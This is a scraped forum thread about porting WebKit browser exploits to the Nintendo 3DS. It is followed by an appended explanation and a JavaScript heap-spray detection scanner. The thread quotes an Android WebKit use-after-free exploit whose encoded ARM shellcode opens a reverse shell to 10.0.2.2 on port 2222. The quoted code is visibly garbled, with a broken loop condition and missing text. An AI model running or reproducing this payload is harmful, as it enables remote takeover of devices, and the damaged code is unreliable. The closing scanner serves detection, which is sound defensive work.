pachura said:
LinkReincarnate said:
Webkit huh? I know I saw an exploit for that just the other day... Probably sandboxed on the ds though
yup lots of them
http://www.google.com/search?rlz=1C1CHFX_e...webkit+exploits
Sorry to be pessimistic, but:
1. Usually, exploits work only for a specific OS, or at least for a specific CPU family (often, x86). Currently, no one even knows for sure what ARM sits there in 3DS...
2. The browser is probably sandboxed and operates in an isolated memory area. After all, no one would like a bug in the browser to crash the suspended game...
3. There's a big chance 3DS' CPU uses special ARM extensions to counter stack/buffer overflow attacks.
It's a custom job that uses very large chunks of arm 9. Arm 9 is in all kinds of android phones and tablets. Any android exploits for webkit?
Yup, they even allow remote code execution. Will that work on the 3DS? Probably not, but it does give a general idea of where vulnerabilities may lie and the methodologies that should be used. BTW, that exploit uses JavaScript. Here is the code for those who are interested.
function heap()
{
    var id = document.getElementById("target");
    var attribute = id.getAttributeNode('id');
    nodes = attribute.childNodes;
    document.body.removeChild(id);
    attribute.removeChild(nodes[0]);
    setTimeout(function() {
        for (var i = 0; i < 70000; i++) { var s = new String(unescape("\u0058\u0058")); };
        var scode = unescape("\u0060\u0060");
        var scode2 = unescape("\u5005\ue1a0");
        var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
        shell += unescape("\uae08"); // Port = 2222
        shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
        shell += unescape("\u2000\u2000"); // string terminate
        do
        {
            scode += scode;
            scode2 += scode2;
        // The loop condition on the next line and the statements that originally
        // followed it were lost when the post was scraped (text is missing between
        // "length" and "250"); the fragment is kept as posted and is not runnable as-is.
        } while (scode.length250){
            // alert("freeze");
            nodes[0].textContent}
    }
    }, 0);
}
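The quoted code is a textbook heap-spray use-after-free: a DOM node is detached, a timer callback fills the heap with copies of an unescape()'d filler string that is doubled in a loop, and the freed node is then touched again. Those structural hallmarks are what a defender can look for in captured pages or proxy-logged scripts. The following is an added example written for this thread, not code from any post in it and not from the exploit's author: a small static heuristic scanner that scores JavaScript source for those hallmarks. The indicator names, regular expressions, weights, the threshold and both sample scripts are assumptions chosen for illustration; the "spray-shaped" sample only mirrors the shape and carries no payload.

```javascript
// Added example (not from the thread): heuristic scoring of JavaScript source
// for heap-spray / detached-node-reuse hallmarks. Indicators, weights and the
// threshold are assumptions chosen for illustration.

const INDICATORS = [
  {
    // unescape("\uXXXX\uXXXX...") carrying a long run of 16-bit escapes:
    // how the quoted exploit embeds its filler and its payload.
    name: "long_unicode_unescape",
    re: /unescape\(\s*["'](?:\\u[0-9a-fA-F]{4}){8,}/,
    weight: 3,
  },
  {
    // x += x; : geometric growth of a filler string.
    name: "string_doubling",
    re: /\b([A-Za-z_$][\w$]*)\s*\+=\s*\1\s*;/,
    weight: 2,
  },
  {
    // counted for-loop with a bound of 10000+ (or a 4+ digit hex literal):
    // bulk allocation used to shape the heap.
    name: "large_allocation_loop",
    re: /for\s*\([^;]*;\s*[A-Za-z_$][\w$]*\s*<\s*(?:\d{5,}|0x[0-9a-fA-F]{4,})\s*;/,
    weight: 2,
  },
  {
    // a node removed from the DOM, then a timer callback shortly after:
    // the use-after-free trigger shape in the quoted code.
    name: "detached_node_reuse",
    re: /removeChild\([\s\S]{0,400}?setTimeout\(/,
    weight: 2,
  },
];

// Score one script: weighted total plus the names of the indicators that fired.
function scanScript(source) {
  const fired = INDICATORS.filter((ind) => ind.re.test(source));
  const score = fired.reduce((sum, ind) => sum + ind.weight, 0);
  return { score, hits: fired.map((ind) => ind.name) };
}

// Decision helper: flag when the score reaches the (assumed) threshold.
function isSuspicious(source, threshold = 5) {
  return scanScript(source).score >= threshold;
}

// Constructed samples, not taken from the thread.
const BENIGN_SAMPLE = `
  var items = document.querySelectorAll(".item");
  for (var i = 0; i < items.length; i++) { items[i].textContent = "ok"; }
  setTimeout(function () { console.log("done"); }, 0);
`;

// Mirrors only the structure: filler doubling, a big allocation loop and a
// detached node poked from a timer. The filler is inert padding, not a payload.
const SPRAY_SHAPED_SAMPLE = `
  var n = document.getElementById("t");
  document.body.removeChild(n);
  setTimeout(function () {
    var pad = unescape("\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c");
    do { pad += pad; } while (pad.length < 0x10000);
    var a = [];
    for (var i = 0; i < 70000; i++) { a[i] = new String(pad); }
    n.textContent;
  }, 0);
`;

console.log(scanScript(BENIGN_SAMPLE));       // { score: 0, hits: [] }
console.log(scanScript(SPRAY_SHAPED_SAMPLE)); // score 9, all four indicators fire
```

Run it with Node (`node scan.js`). Each indicator alone is weak (a benign page may well double a string or loop 100000 times), which is why the decision is a weighted sum rather than any single match; tune the weights and threshold against your own corpus before relying on it, and treat a hit as a prompt for manual review of the script, not as a verdict.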